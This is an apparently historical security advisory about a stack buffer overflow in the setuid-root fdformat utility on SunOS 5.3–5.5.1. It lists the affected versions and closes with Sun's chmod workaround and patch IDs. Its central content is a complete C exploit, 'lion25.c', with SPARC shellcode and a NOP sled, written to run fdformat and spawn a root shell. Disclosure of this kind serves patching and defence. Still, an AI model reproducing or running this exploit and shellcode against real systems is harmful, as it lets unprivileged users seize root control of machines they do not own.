COMMAND
/bin/fdformat
SYSTEMS AFFECTED
SunOS versions 5.3, 5.4, 5.5, 5.5_x86, 5.5.1, and 5.5.1_x86 are
vulnerable.
PROBLEM
fdformat(1) is a utility for formatting both diskettes and PCMCIA
memory cards. Due to insufficient bounds checking on arguments
which are supplied by users, it is possible to overwrite the
internal stack space of the fdformat program while it is
executing. By supplying a carefully designed argument to the
fdformat program, intruders may be able to force fdformat to
execute arbitrary commands. As fdformat is setuid root, this may
allow intruders to run arbitrary commands with root privileges.
The buffer overflow bug in find_media() posted by Cristian Schipor
is present in /bin/fdformat too distributions the suid-exec bit
on and it is owned by root). By exploiting fdformat with
suid-exec bit on, anyone can gain a root (or who is the owner of
fdformat) shell.
My exploits (with argv[1] you can change the STACK_OFFSET, +- x,
x=8*k k=1,2,3,...):
------------------------- lion25.c -------------------------------
/*
Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
2.5.1
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 704
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
perror("execl failed");
}
----------------------- end of lion25.c --------------------------
SOLUTION
Sun recommends, as a workaround, that setuid permission be
removed from the eject and fdformat programs by using commands
such as the following:
chmod 555 /usr/bin/fdformat
The same vulnerabilities have been fixed in the upcoming release
of Solaris 2.6. The vulnerabilities relating to fdformat in the
volume management library are fixed by the following patches:
OS version Patch ID
---------- --------
SunOS 5.5.1 104776-01
SunOS 5.5.1_x86 104777-01
SunOS 5.5 103024-02
SunOS 5.5_x86 103044-02
SunOS 5.4 101907-14
SunOS 5.4_x86 101908-14
SunOS 5.3 101331-07